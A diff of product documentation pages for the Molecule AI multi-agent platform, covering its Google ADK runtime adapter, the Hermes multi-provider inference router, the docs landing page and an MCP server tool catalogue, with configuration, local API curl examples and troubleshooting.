title: Google ADK Runtime
description: Run Molecule AI workspaces on Google's Agent Development Kit (ADK) — Gemini-native agents with sequential, parallel, and loop workflows.
---
import { Callout } from 'fumadocs-ui/components/callout';
# Google ADK Runtime
The `google-adk` runtime adapter integrates [Google's Agent Development Kit](https://github.com/google/adk-python) (v1.0+, Apache-2.0) into Molecule AI workspaces. ADK is Google's production-grade Python framework for building AI agents backed by Gemini models, with built-in support for sequential, parallel, and loop execution patterns.
<Callout type="info">
Google ADK adapter was added in PR #550 (issue #542). It passes 46/46 tests with 100% coverage.
</Callout>
---
## When to use Google ADK vs other runtimes
| | Google ADK | LangGraph | AutoGen |
|---|---|---|---|
| **Best for** | Gemini-native agents, Google Cloud integrations | Complex stateful graphs, fine-grained flow control | Multi-agent dialogue and code-execution workflows |
| **Model family** | Gemini (gemini-2.0-flash, gemini-1.5-pro, …) | Any LangChain-supported model | Any AutoGen-supported model |
| **Execution model** | Sequential / Parallel / Loop built-in | Explicit graph with nodes and edges | Conversation-driven, agents negotiate through dialogue |
| **Tool support** | Google-native + LangChain tools | LangChain tools | Python functions, code execution |
| **State persistence** | ADK SessionService | LangGraph checkpointer | In-process conversation history |
| **Google Cloud fit** | First-class | Via LangChain integrations | Via plugin |
**Choose Google ADK when:**
- Your workload is Google Cloud-native (Vertex AI, Cloud Tools, Google Workspace)
- You want Gemini models with minimal adapter overhead
- You prefer ADK's opinionated sequential/parallel/loop composition over explicit graph edges
- You're building agents that call Google APIs (Maps, Search, Drive, etc.)
---
## Installation
Each Molecule AI workspace template is a standalone Docker image. The Google ADK workspace template (`molecule-ai-workspace-template-google-adk`) ships with the adapter pre-configured. To use it, set the runtime in your workspace `config.yaml`:
```yaml title="config.yaml"
runtime: google-adk
model: google:gemini-2.0-flash
```
If you are building a custom image on top of `molecule-ai-workspace-runtime`, add the adapter dependency to your `requirements.txt`:
```text title="requirements.txt"
molecule-ai-workspace-runtime>=0.1.0
google-adk>=1.0.0
```
Install manually with pip:
```bash
pip install google-adk
```
<Callout type="warn">
Google ADK requires **Python 3.10+**. Ensure your workspace Dockerfile uses `python:3.11-slim` or newer.
</Callout>
---
## Secrets
The adapter reads your Google credentials from workspace secrets. Set these before starting a Google ADK workspace:
| Secret key | Required | Purpose |
|---|---|---|
| `GOOGLE_API_KEY` | Yes (unless using Vertex AI) | Gemini API key from [Google AI Studio](https://aistudio.google.com/app/apikey) |
| `GOOGLE_CLOUD_PROJECT` | Vertex AI only | GCP project ID |
| `GOOGLE_CLOUD_LOCATION` | Vertex AI only | Region (e.g. `us-central1`) |
| `GOOGLE_GENAI_USE_VERTEXAI` | Vertex AI only | Set to `true` to route via Vertex AI instead of the public API |
Set secrets via the canvas Settings panel or the API:
```bash
curl -X PUT http://localhost:8080/settings/secrets \
-H 'Content-Type: application/json' \
-d '{"key":"GOOGLE_API_KEY","value":"AIza..."}'
```
---
## Quickstart
Once you have set `GOOGLE_API_KEY` (see [Secrets](#secrets) above), these steps take you from zero to a running workspace with a working multi-turn conversation:
```bash
# 1. Create a google-adk workspace
WS=$(curl -s -X POST http://localhost:8080/workspaces \
-H "Content-Type: application/json" \
-d '{
"name": "adk-agent",
"role": "Google ADK inference worker",
"runtime": "google-adk",
"model": "google:gemini-2.0-flash"
}' | jq -r '.id')
echo "Workspace: $WS"
# 2. Wait for ready (~30s)
until curl -s http://localhost:8080/workspaces/$WS \
| jq -r '.status' | grep -q ready; do
echo "Waiting..."; sleep 5
done
# 3. Send your first task
curl -s -X POST http://localhost:8080/workspaces/$WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc": "2.0",
"id": "1",
"method": "message/send",
"params": {
"message": {
"role": "user",
"parts": [{"kind": "text", "text": "Summarise the ADK architecture in 3 bullet points."}]
}
}
}' | jq '.result.parts[0].text'
# 4. Multi-turn — session state is preserved across calls
curl -s -X POST http://localhost:8080/workspaces/$WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc": "2.0",
"id": "2",
"method": "message/send",
"params": {
"message": {
"role": "user",
"parts": [{"kind": "text", "text": "Now give me a one-line TL;DR of what you just said."}]
}
}
}' | jq '.result.parts[0].text'
# 5. Vertex AI alternative — set these instead of GOOGLE_API_KEY
# curl -X PUT http://localhost:8080/settings/secrets \
# -d '{"key":"GOOGLE_GENAI_USE_VERTEXAI","value":"1"}'
# curl -X PUT http://localhost:8080/settings/secrets \
# -d '{"key":"GOOGLE_CLOUD_PROJECT","value":"my-gcp-project"}'
# curl -X PUT http://localhost:8080/settings/secrets \
# -d '{"key":"GOOGLE_CLOUD_LOCATION","value":"us-central1"}'
```
**How session state works:** the adapter maps each A2A `context_id` to an `InMemorySessionService` session. State is isolated per context and persists across calls within the same session — so the agent in step 4 recalls the answer from step 3 without any orchestrator history management. To persist sessions across workspace restarts, set `session_db_url` in `runtime_config` (see [Configuration reference](#configuration-reference)).
**Model prefix stripping:** the adapter strips the `google:` prefix before passing the model name to ADK — `google:gemini-2.0-flash` becomes `gemini-2.0-flash`. Always use the `google:` prefix in your workspace config; the adapter handles the rest.
---
## Basic usage
### Minimal `config.yaml`
```yaml title="config.yaml"
name: My ADK Agent
runtime: google-adk
model: google:gemini-2.0-flash
role: |
You are a helpful assistant. Answer questions clearly and concisely.
tier: 2
```
### With runtime configuration
```yaml title="config.yaml"
name: Research Agent
runtime: google-adk
model: google:gemini-1.5-pro
role: |
You are a research specialist. Gather and synthesise information from multiple sources.
tier: 2
runtime_config:
max_iterations: 20
enable_code_execution: true
temperature: 0.3
```
### Org template example
```yaml title="org-template/org.yaml"
org_name: Research Team
defaults:
runtime: google-adk
model: google:gemini-2.0-flash
tier: 2
workspaces:
- name: Research Lead
role: Coordinate research tasks and synthesise findings from your team.
children:
- name: Web Researcher
role: Search the web and extract relevant information.
runtime_config:
enable_code_execution: false
- name: Data Analyst
role: Analyse datasets and produce statistical summaries.
runtime_config:
enable_code_execution: true
```
---
## Configuration reference
All options go under `runtime_config:` in `config.yaml`.
| Option | Type | Default | Description |
|---|---|---|---|
| `max_iterations` | integer | `10` | Maximum agent reasoning steps per turn |
| `temperature` | float | `0.0` | Sampling temperature passed to the Gemini model (0.0–2.0) |
| `enable_code_execution` | boolean | `false` | Allow the agent to execute Python code via ADK's built-in code-execution tool |
| `output_key` | string | `"output"` | Key in the ADK session state that holds the agent's final response |
| `session_db_url` | string | `null` | SQLite or Postgres URL for ADK session persistence across restarts. If null, uses in-memory session storage. |
---
## Tools and plugins
The Google ADK adapter is fully compatible with Molecule AI's plugin system. Plugins installed in a workspace are injected into the ADK agent's tool list via the runtime's plugin registry.
**Supported plugin shapes with Google ADK:**
| Plugin shape | Supported | Notes |
|---|---|---|
| MCP server | Yes | Tools exposed via MCP are wrapped as ADK `FunctionTool` instances |
| Skill files | Yes | Skills are injected into the system prompt |
| Hook scripts | Yes | `PreToolUse` / `PostToolUse` / `UserPromptSubmit` hooks fire normally |
| Slash commands | Yes | Commands are routed through the workspace A2A server as usual |
Example: adding the `superpowers` plugin to a Google ADK workspace:
```yaml title="config.yaml"
runtime: google-adk
model: google:gemini-2.0-flash
plugins:
- superpowers
- molecule-dev
```
---
## A2A communication
Google ADK workspaces participate in the full Molecule AI A2A network — they can receive tasks from parent agents, delegate to children, and send messages to siblings — identically to any other runtime.
The adapter injects the standard A2A MCP tools (`list_peers`, `delegate_task`, `delegate_task_async`, `send_message_to_user`, `commit_memory`, `recall_memory`) into the ADK agent's tool list automatically.
---
## Transcript support
The Google ADK adapter exposes live session transcripts to the canvas "look over shoulder" view. Each agent turn (tool calls, model responses) is streamed as it completes.
---
## Comparison: config.yaml across runtimes
<br />
```yaml title="LangGraph workspace"
runtime: langgraph
model: anthropic:claude-opus-4-7
```
```yaml title="AutoGen workspace"
runtime: autogen
model: openai:gpt-4o
```
```yaml title="Google ADK workspace"
runtime: google-adk
model: google:gemini-2.0-flash
runtime_config:
temperature: 0.1
```
The `model` field follows `<provider>:<model-id>` format. For Google ADK, the `google:` prefix routes through the `google-genai` LangChain integration.
---
## Troubleshooting
### `google.api_core.exceptions.InvalidArgument: 400 API key not valid`
Your `GOOGLE_API_KEY` secret is missing or invalid. Check it in the canvas Settings panel and verify it in [Google AI Studio](https://aistudio.google.com/app/apikey).
### `RuntimeError: google-adk is not installed`
The workspace image is missing the `google-adk` Python package. If you are using a custom image, ensure `requirements.txt` includes `google-adk>=1.0.0` and rebuild the image.
### Agent returns empty response after tool calls
Check `max_iterations` in `runtime_config`. If the agent hits the iteration cap mid-task, it returns the last partial result. Increase `max_iterations` or break the task into smaller sub-tasks via A2A delegation.
### Vertex AI 403 Permission Denied
Ensure `GOOGLE_CLOUD_PROJECT`, `GOOGLE_CLOUD_LOCATION`, and `GOOGLE_GENAI_USE_VERTEXAI=true` are all set, and that your service account has the `roles/aiplatform.user` IAM role on the project.
---
## See also
- [Architecture — Workspace Runtime](/docs/architecture#workspace-runtime) — how adapters fit into the runtime
- [Concepts — Workspaces](/docs/concepts#workspaces) — workspace primitives
- [Org Template](/docs/org-template) — deploy a full team from a YAML definition
- [Plugins](/docs/plugins) — extend your ADK agents with hooks, skills, and MCP servers
- [Google ADK Python on GitHub](https://github.com/google/adk-python) — upstream documentation

View File

@ -1,3 +1,6 @@
---
title: "Guides"
---
# Guides
Step-by-step guides for common Molecule AI integrations and configurations.

View File

@ -1,3 +1,6 @@
---
title: "Skill Catalog"
---
# Skill Catalog
Skills extend what a workspace agent can do — from browser automation

345
content/docs/hermes.mdx Normal file
View File

@ -0,0 +1,345 @@
---
title: Hermes Runtime & Multi-Provider Dispatch
description: Hermes is Molecule AI's built-in inference router. Route tasks to Anthropic, Gemini, or any OpenAI-compatible model through native dispatch paths — with correct multi-turn history on all three.
---
import { Callout } from 'fumadocs-ui/components/callout';
# Hermes Runtime & Multi-Provider Dispatch
Hermes is Molecule AI's built-in inference router powering `runtime: hermes` workspaces. It supports three dispatch paths — a native Anthropic Messages API path, a native Gemini `generateContent` path, and an OpenAI-compatible shim for 13+ other providers — keyed automatically by which API secret is present on the workspace.
Phases 2a through 2e are fully merged to `main`:
- **Phase 2a** (PR #240) — native Anthropic dispatch
- **Phase 2b** (PR #255) — native Gemini dispatch with correct `role: "model"` + `parts` wire format
- **Phase 2c** (PR #267) — correct multi-turn history preserved as turns (not flattened) on all three paths
- **Phase 2d** (PR #499) — stacked system messages (`system_blocks` kwarg) on Anthropic and Gemini paths
- **Phase 2e** (PRs #644, #645) — native `tools=[]` parameter + `response_format=json_schema` structured output on Anthropic native path
<Callout type="info">
**Remaining roadmap:** vision content blocks and streaming on native paths are scoped for a future release.
</Callout>
---
## Dispatch table
Hermes selects an inference path based on which API key is set on the workspace. Keys are resolved in priority order:
> `HERMES_API_KEY` → `OPENROUTER_API_KEY` → `ANTHROPIC_API_KEY` → `GEMINI_API_KEY`
The first key found wins. Don't set `HERMES_API_KEY` if you want native Anthropic or Gemini dispatch — it takes priority and routes through the OpenAI-compat shim.
| Key present | Dispatch path | Provider | Wire format |
|---|---|---|---|
| `ANTHROPIC_API_KEY` | Native Anthropic | Anthropic | Messages API — `{role, content}` |
| `GEMINI_API_KEY` | Native Gemini | Google | `generateContent` — `{role: "model", parts: [{text}]}` |
| `OPENROUTER_API_KEY` / `HERMES_API_KEY` / other | OpenAI-compat shim | 13+ providers | OpenAI Chat Completions |
| None | Error | — | — |
**Fail-loud semantics:** if `ANTHROPIC_API_KEY` is set but the `anthropic` Python package is not installed in the workspace image, Hermes raises a `RuntimeError` immediately — before any inference attempt. Same for `google-genai`. Silent fallback to the compat shim would mask format errors; Hermes fails loudly instead.
---
## Secrets
Set provider keys as global or workspace-level secrets:
```bash
# Native Anthropic dispatch
curl -X PUT http://localhost:8080/settings/secrets \
-H "Content-Type: application/json" \
-d '{"key":"ANTHROPIC_API_KEY","value":"sk-ant-..."}'
# Native Gemini dispatch
curl -X PUT http://localhost:8080/settings/secrets \
-H "Content-Type: application/json" \
-d '{"key":"GEMINI_API_KEY","value":"YOUR-GEMINI-KEY"}'
# OpenAI-compat shim (OpenRouter, Groq, Mistral, etc.)
curl -X PUT http://localhost:8080/settings/secrets \
-H "Content-Type: application/json" \
-d '{"key":"OPENROUTER_API_KEY","value":"sk-or-..."}'
```
To force a specific workspace to use Gemini dispatch when a global `ANTHROPIC_API_KEY` is set, clear the key at the workspace level:
```bash
curl -X PUT http://localhost:8080/workspaces/$GEMINI_WS/secrets \
-H "Content-Type: application/json" \
-d '{"key":"ANTHROPIC_API_KEY","value":""}'
```
---
## Quickstart
### Native Anthropic dispatch
```bash
export MOLECULE_API=http://localhost:8080
# 1. Store your Anthropic key
curl -s -X PUT $MOLECULE_API/settings/secrets \
-H "Content-Type: application/json" \
-d '{"key":"ANTHROPIC_API_KEY","value":"sk-ant-YOUR-KEY"}' | jq .
# 2. Create a Hermes workspace
ANTHROPIC_WS=$(curl -s -X POST $MOLECULE_API/workspaces \
-H "Content-Type: application/json" \
-d '{
"name": "hermes-anthropic",
"role": "Inference worker — native Anthropic path",
"runtime": "hermes",
"model": "anthropic:claude-sonnet-4-5"
}' | jq -r '.id')
# 3. Wait for ready
until curl -s $MOLECULE_API/workspaces/$ANTHROPIC_WS \
| jq -r '.status' | grep -q ready; do sleep 5; done
# 4. Confirm dispatch path
curl -s -X POST $MOLECULE_API/workspaces/$ANTHROPIC_WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc":"2.0","id":"probe-1","method":"message/send",
"params":{"message":{"role":"user","parts":[{"kind":"text",
"text":"Which provider API are you calling to generate this response?"}]}}
}' | jq '.result.parts[0].text'
# Expected: confirms Anthropic Messages API — no OpenAI-compat translation layer
```
### Native Gemini dispatch
```bash
# 1. Store your Gemini key
curl -s -X PUT $MOLECULE_API/settings/secrets \
-H "Content-Type: application/json" \
-d '{"key":"GEMINI_API_KEY","value":"YOUR-GEMINI-KEY"}' | jq .
# 2. Create a Gemini workspace
GEMINI_WS=$(curl -s -X POST $MOLECULE_API/workspaces \
-H "Content-Type: application/json" \
-d '{
"name": "hermes-gemini",
"role": "Inference worker — native Gemini path",
"runtime": "hermes",
"model": "gemini:gemini-2.0-flash"
}' | jq -r '.id')
# 3. Wait for ready
until curl -s $MOLECULE_API/workspaces/$GEMINI_WS \
| jq -r '.status' | grep -q ready; do sleep 5; done
# 4. Confirm dispatch path
curl -s -X POST $MOLECULE_API/workspaces/$GEMINI_WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc":"2.0","id":"probe-2","method":"message/send",
"params":{"message":{"role":"user","parts":[{"kind":"text",
"text":"Which provider API are you calling?"}]}}
}' | jq '.result.parts[0].text'
# Expected: confirms Google generateContent — role: "model" + parts[] wrapper used correctly
```
### Multi-turn history (Phase 2c)
```bash
# Turn 1
curl -s -X POST $MOLECULE_API/workspaces/$ANTHROPIC_WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc":"2.0","id":"turn-1","method":"message/send",
"params":{"message":{"role":"user","parts":[{"kind":"text",
"text":"My name is Alice. Remember that."}]}}
}' | jq '.result.parts[0].text'
# Turn 2 — history is threaded as turns, not flattened into a single blob
curl -s -X POST $MOLECULE_API/workspaces/$ANTHROPIC_WS/a2a \
-H "Content-Type: application/json" \
-d '{
"jsonrpc":"2.0","id":"turn-2","method":"message/send",
"params":{"message":{"role":"user","parts":[{"kind":"text",
"text":"What is my name?"}]}}
}' | jq '.result.parts[0].text'
# Expected: "Alice" — role attribution is preserved across turns
```
Before Phase 2c, multi-turn history was flattened into a single user blob. The model could often recover context from the text but lost clean role attribution, which caused failures on structured prompts. Phase 2c passes turns as turns: OpenAI and Anthropic use `{role, content}`; Gemini uses `{role: "model", parts: [{text}]}`.
---
## Multi-provider teams
An orchestrator can fan tasks to Anthropic and Gemini workers simultaneously, each routed through its native path — no application-level provider switching required:
```bash
# Fan out — both workers fire via delegate_task_async
curl -s -X POST $MOLECULE_API/workspaces/$ORCH_ID/a2a \
-H "Content-Type: application/json" \
-d "{
\"jsonrpc\":\"2.0\",\"id\":\"fan-1\",\"method\":\"message/send\",
\"params\":{\"message\":{\"role\":\"user\",\"parts\":[{\"kind\":\"text\",
\"text\":\"delegate_task_async $ANTHROPIC_WS 'Draft release notes for v2.1' AND delegate_task_async $GEMINI_WS 'Summarise the last 30 days of support tickets'\"}]}}
}" | jq .
```
Both workers receive correctly formatted messages through their native paths. No LiteLLM proxy layer. No format translation overhead on every request.
---
## Advanced: stacked system messages
[NousResearch Hermes 4](https://hermes4.nousresearch.com) works best when persona, tool context, and reasoning policy are sent as **separate** `{"role": "system"}` entries rather than one concatenated string. `HermesA2AExecutor` supports this via the `system_blocks` kwarg (PR #499).
### Usage
```python
from workspace_template.executors.hermes_a2a_executor import HermesA2AExecutor
executor = HermesA2AExecutor(
system_blocks=[
"You are a senior security auditor. Be terse and precise.", # persona
"You have access to bash, file search, and grep tools.", # tools context
"Think step-by-step before concluding. Cite evidence.", # reasoning policy
]
)
```
The executor emits each non-empty, non-`None` block as a separate `{"role": "system"}` message in the recommended order: **persona → tools context → reasoning policy**.
### Behaviour
| Condition | Result |
|-----------|--------|
| `system_blocks` is set | Emits one `{"role": "system"}` per non-empty block; `system_prompt` is ignored |
| Entry is `None` or `""` | Silently skipped |
| All entries empty | Zero system messages emitted |
| `system_blocks` not set (`None`) | Falls back to the legacy `system_prompt` path — **fully backward-compatible** |
### Backward compatibility
Callers that pass a single `system_prompt` string are **unaffected**:
```python
# Legacy path — still works, no changes required
executor = HermesA2AExecutor(
system_prompt="You are a security auditor. Think step-by-step."
)
```
Only set `system_blocks` when you want fine-grained control over block ordering or need to inject tool manifests into a dedicated block.
---
## Native tools parameter (Phase 2e — PR #644)
Hermes now passes tool definitions to the model via the native `tools=[]` API parameter instead of injecting them as text in the prompt. This applies to the **Anthropic native dispatch path** and produces structured tool call/result blocks that the Nous/Hermes-3 tool call format handles correctly.
```python
executor = HermesA2AExecutor(
tools=[
{
"name": "bash",
"description": "Run a bash command and return stdout/stderr.",
"input_schema": {
"type": "object",
"properties": {
"command": {"type": "string", "description": "The shell command to run"}
},
"required": ["command"]
}
}
]
)
```
The OpenAI-compat shim path also accepts `tools=[]` but continues to inject them as text-in-prompt for compatibility with OpenRouter-routed models that don't natively support tool calls.
## Structured output — `response_format` (Phase 2e — PR #645)
`response_format=json_schema` is wired through to the Anthropic native dispatch path. Pass a JSON Schema definition to request strictly-typed JSON output from the model:
```python
executor = HermesA2AExecutor(
response_format={
"type": "json_schema",
"json_schema": {
"name": "audit_finding",
"schema": {
"type": "object",
"properties": {
"severity": {"type": "string", "enum": ["critical", "high", "medium", "low"]},
"description": {"type": "string"},
"remediation": {"type": "string"}
},
"required": ["severity", "description", "remediation"]
}
}
}
)
```
The model's completion will always be valid JSON matching the schema. The Gemini native and OpenAI-compat shim paths do not yet support `response_format` — it is silently ignored on those paths.
---
## Capability table
### Shipped (Phases 2a–2e — all merged to main)
| Capability | OpenAI-compat shim | Anthropic native | Gemini native |
|---|---|---|---|
| Plain text, single-turn | ✅ | ✅ | ✅ |
| Multi-turn history | ⚠️ flattened into one user blob | ✅ role-attributed turns | ✅ `role: "model"` + `parts` wrapper |
| Correct Gemini wire format | ❌ wrong role, missing parts | — | ✅ |
| No compat-shim translation overhead | ❌ every request translated | ✅ | ✅ |
| Stacked system messages (`system_blocks`) | ❌ | ✅ | ✅ |
| Native `tools=[]` parameter | ⚠️ text-in-prompt injection | ✅ PR #644 | 📋 roadmap |
| Structured output (`response_format=json_schema`) | ❌ | ✅ PR #645 | 📋 roadmap |
### Roadmap (future release)
| Capability | Anthropic native | Gemini native |
|---|---|---|
| Vision content blocks | 📋 | 📋 |
| Streaming | 📋 | 📋 |
| Native tools on Gemini path | — | 📋 |
| Structured output on Gemini path | — | 📋 |
---
## Troubleshooting
### `RuntimeError: anthropic is not installed`
The `anthropic` Python package is missing from the workspace image. Add `anthropic` to `requirements.txt` in your custom image and rebuild, or use the standard `molecule-ai-workspace-template-hermes` image.
### Gemini workspace getting Anthropic dispatch instead
A global `ANTHROPIC_API_KEY` is taking priority. Clear it at the workspace level:
```bash
curl -X PUT $MOLECULE_API/workspaces/$GEMINI_WS/secrets \
-d '{"key":"ANTHROPIC_API_KEY","value":""}'
```
### Multi-turn context lost between calls
Each workspace maintains its own history buffer. Ensure you are sending all turns of a conversation to the same workspace. A2A `context_id` scopes history within the workspace.
### OpenAI-compat shim returns garbled Gemini output
If you are routing a Gemini model through a key that triggers the compat shim (e.g. `OPENROUTER_API_KEY`), you will see the old role/format translation issues. Switch to `GEMINI_API_KEY` for native dispatch.
---
## See also
- [Concepts — Workspaces](/docs/concepts#workspaces)
- [API Reference — POST /workspaces](/docs/api-reference#post-workspaces)
- [Google ADK Runtime](/docs/google-adk) — Gemini-native alternative to Hermes for ADK-first workflows
- PR #240: [Phase 2a — native Anthropic dispatch](https://github.com/Molecule-AI/molecule-core/pull/240)
- PR #255: [Phase 2b — native Gemini dispatch](https://github.com/Molecule-AI/molecule-core/pull/255)
- PR #267: [Phase 2c — multi-turn history on all paths](https://github.com/Molecule-AI/molecule-core/pull/267)
- Issue [#513](https://github.com/Molecule-AI/molecule-core/issues/513)

View File

@ -1,3 +1,6 @@
---
title: "Incident Log — molecule-core"
---
# Incident Log — molecule-core
> This file documents security incidents, outages, and degraded states.

83
content/docs/index.mdx Normal file
View File

@ -0,0 +1,83 @@
---
title: Welcome to Molecule AI
description: Multi-agent organisations as code — templates, plugins, channels, and the runtime that ties them together.
---
Molecule AI is an open platform for building, running, and operating
multi-agent organisations. You define your team in one YAML file
(`org.yaml`), pick the plugins each role needs, wire up the channels they
talk on, schedule their recurring work — and the platform takes care of the
rest.
## Try it now
| | |
|---|---|
| **Dashboard** | [app.moleculesai.app](https://app.moleculesai.app) — create orgs, deploy agents |
| **API** | [api.moleculesai.app](https://api.moleculesai.app) — control plane REST API |
| **Documentation** | [doc.moleculesai.app](https://doc.moleculesai.app) — you are here |
| **Status** | [status.moleculesai.app](https://status.moleculesai.app) — uptime monitoring |
| **Self-host** | [Self-Hosting Guide](/docs/self-hosting) — run on your own infrastructure |
## What you can build
- **Self-running engineering teams** — PM, Dev Lead, frontend / backend / devops
agents, security auditor, QA — all coordinating through A2A messages and
scheduled audits, opening real PRs to your real repo.
- **Research squads** — market analysts, technical researchers, competitive
intelligence agents that sweep the web on a cadence and write findings to
shared memory.
- **Product orgs** — anything you can describe as a tree of roles and
responsibilities.
- **Hybrid teams** — mix cloud-hosted agents with [external agents](/docs/external-agents)
running on your own infrastructure, edge devices, or other clouds.
## How it works
1. **Templates.** Describe your org as a YAML tree of workspaces. Each workspace
is a real container running an LLM agent. Templates ship with sensible
defaults so you can spin one up in one command.
2. **Plugins.** Add capabilities to one role or all of them — guardrails,
skills, slash commands, browser automation, MCP servers. Plugins compose;
per-role overrides UNION with the defaults.
3. **Channels.** Connect any role to [Telegram, Slack, or Lark/Feishu](/docs/channels)
so users can talk to agents directly from their existing tools.
4. **Schedules.** Define [recurring work](/docs/schedules) in cron syntax. The
runtime fires the prompt at the scheduled time, supervised against panics
with a liveness watchdog.
5. **Tokens.** Generate [API tokens](/docs/tokens) per workspace for secure
authentication. Rotate, revoke, and audit from the dashboard or API.
6. **The canvas.** A live visualisation of your org — every workspace as a
node, every A2A message as an edge, every memory write tracked in real time.
## Eight runtime adapters
| Runtime | Description |
|---------|-------------|
| Claude Code | Anthropic Claude with code execution |
| LangGraph | LangChain ReAct agent with tools |
| OpenClaw | Multi-file prompt system with SOUL |
| CrewAI | Role-based agent with task delegation |
| AutoGen | Microsoft conversable agents |
| DeepAgents | Deep research with planning |
| Hermes | NousResearch Hermes-3 multi-provider |
| Gemini CLI | Google Gemini CLI workspace |
## Integrate with everything
- **[MCP Server](/docs/mcp-server)** — 87 tools for managing Molecule AI from any
MCP-compatible AI agent (Claude Code, Cursor, etc.)
- **[Python SDK](https://pypi.org/project/molecule-ai-sdk)** — `pip install molecule-ai-sdk`
- **[External Agents](/docs/external-agents)** — register any HTTP agent as a
first-class workspace
## Where to next
- New here? Read the [Quickstart](/docs/quickstart) — spin up your first
agent in under five minutes.
- Want the architecture tour? Start with [Concepts](/docs/concepts) and
[Architecture](/docs/architecture).
- Ready to build your own org? Jump to [Org Templates](/docs/org-template).
- Want to connect your own agent? See [External Agents](/docs/external-agents).
- Need API access? Check [Token Management](/docs/tokens) and the
[API Reference](/docs/api-reference).

View File

@ -1,3 +1,6 @@
---
title: "Molecule AI + opencode Integration"
---
# Molecule AI + opencode Integration
> **opencode** is an AI coding agent ([opencode.ai](https://opencode.ai)) that supports remote MCP servers via `opencode.json`. This guide shows how to wire it to your Molecule AI workspace.

162
content/docs/mcp-server.mdx Normal file
View File

@ -0,0 +1,162 @@
---
title: MCP Server
description: Manage Molecule AI workspaces from any MCP-compatible AI agent using 87 tools.
---
The Molecule AI MCP server lets any MCP-compatible AI agent (Claude Code,
Cursor, etc.) manage workspaces, agents, secrets, memory, schedules,
channels, and more through the platform API.
## Quick start
### Install
```bash
npx @molecule-ai/mcp-server@1.0.0
```
### Configure in `.mcp.json`
```json
{
"mcpServers": {
"molecule": {
"type": "stdio",
"command": "npx",
"args": ["@molecule-ai/mcp-server@1.0.0"],
"env": {
"MOLECULE_URL": "http://localhost:8080"
}
}
}
}
```
<Callout type="warn">
**Pin the package version.** The examples above use `@1.0.0` — always specify an exact version and omit the `-y` flag. An unpinned `npx -y @molecule-ai/mcp-server` (no version) silently installs whatever npm serves on the next restart; if the package is ever compromised, it runs with your full MCP client permissions. Check [npm](https://www.npmjs.com/package/@molecule-ai/mcp-server) for the latest stable release before upgrading.
</Callout>
For SaaS deployments, set `MOLECULE_URL` to your tenant URL:
```json
"MOLECULE_URL": "https://your-org.moleculesai.app"
```
### Verify
Once configured, your MCP client should show 87 Molecule AI tools. Test with:
```
list_workspaces
```
## Tool categories
The MCP server exposes tools across these categories:
### Workspace management
| Tool | API Route | Description |
|---|---|---|
| `list_workspaces` | `GET /workspaces` | List all workspaces |
| `create_workspace` | `POST /workspaces` | Create a new workspace |
| `get_workspace` | `GET /workspaces/:id` | Get workspace details |
| `update_workspace` | `PATCH /workspaces/:id` | Update workspace fields |
| `delete_workspace` | `DELETE /workspaces/:id` | Delete a workspace |
| `restart_workspace` | `POST /workspaces/:id/restart` | Restart container |
| `pause_workspace` | `POST /workspaces/:id/pause` | Pause workspace |
| `resume_workspace` | `POST /workspaces/:id/resume` | Resume paused workspace |
### Communication
| Tool | API Route | Description |
|---|---|---|
| `chat_with_agent` | `POST /workspaces/:id/a2a` | Send A2A message |
| `async_delegate` | `POST /workspaces/:id/delegate` | Fire-and-forget delegation |
| `check_delegations` | `GET /workspaces/:id/delegations` | Check delegation status |
| `list_peers` | `GET /registry/:id/peers` | Find peer workspaces |
| `notify_user` | `POST /workspaces/:id/notify` | Push notification to canvas |
### Configuration and secrets
| Tool | API Route | Description |
|---|---|---|
| `get_config` | `GET /workspaces/:id/config` | Get config.yaml |
| `update_config` | `PATCH /workspaces/:id/config` | Update config |
| `list_secrets` | `GET /workspaces/:id/secrets` | List secret keys |
| `set_secret` | `POST /workspaces/:id/secrets` | Set a secret |
| `set_global_secret` | `PUT /settings/secrets` | Set a global secret |
### Memory
| Tool | API Route | Description |
|---|---|---|
| `memory_list` | `GET /workspaces/:id/memory` | List memory keys |
| `memory_get` | `GET /workspaces/:id/memory/:key` | Get value |
| `memory_set` | `POST /workspaces/:id/memory` | Set key-value |
| `search_memory` | `GET /workspaces/:id/memories` | Full-text search |
### Files
| Tool | API Route | Description |
|---|---|---|
| `list_files` | `GET /workspaces/:id/files` | List workspace files |
| `read_file` | `GET /workspaces/:id/files/*path` | Read file content |
| `write_file` | `PUT /workspaces/:id/files/*path` | Write file |
| `replace_all_files` | `PUT /workspaces/:id/files` | Replace all files |
### Schedules
| Tool | API Route | Description |
|---|---|---|
| `list_schedules` | `GET /workspaces/:id/schedules` | List cron schedules |
| `create_schedule` | `POST /workspaces/:id/schedules` | Create schedule |
| `run_schedule` | `POST /workspaces/:id/schedules/:id/run` | Trigger now |
### Channels
| Tool | API Route | Description |
|---|---|---|
| `list_channels` | `GET /workspaces/:id/channels` | List channels |
| `add_channel` | `POST /workspaces/:id/channels` | Add Telegram/Slack/Lark |
| `test_channel` | `POST /workspaces/:id/channels/:id/test` | Test connectivity |
| `send_channel_message` | `POST /workspaces/:id/channels/:id/send` | Send message |
### Plugins
| Tool | API Route | Description |
|---|---|---|
| `list_installed_plugins` | `GET /workspaces/:id/plugins` | List installed |
| `install_plugin` | `POST /workspaces/:id/plugins` | Install from source |
| `uninstall_plugin` | `DELETE /workspaces/:id/plugins/:name` | Uninstall |
### Tokens
| Tool | API Route | Description |
|---|---|---|
| `list_tokens` | `GET /workspaces/:id/tokens` | List workspace tokens |
| `create_token` | `POST /workspaces/:id/tokens` | Create bearer token |
| `revoke_token` | `DELETE /workspaces/:id/tokens/:id` | Revoke token |
### Templates and bundles
| Tool | API Route | Description |
|---|---|---|
| `list_templates` | `GET /templates` | Available templates |
| `import_org` | `POST /org/import` | Import org template |
| `export_bundle` | `GET /bundles/export/:id` | Export workspace |
| `import_bundle` | `POST /bundles/import` | Import workspace |
## Environment variables
| Variable | Default | Description |
|---|---|---|
| `MOLECULE_URL` | `http://localhost:8080` | Platform API URL |
## Troubleshooting
| Issue | Fix |
|---|---|
| Connection refused | Check `MOLECULE_URL` points to running platform |
| 401 Unauthorized | Token expired or revoked — create a new one |
| Tools not showing | Run `npx @molecule-ai/mcp-server@1.0.0` standalone to check errors |

32
content/docs/meta.json Normal file
View File

@ -0,0 +1,32 @@
{
"title": "Documentation",
"pages": [
"index",
"changelog",
"quickstart",
"concepts",
"workspace-config",
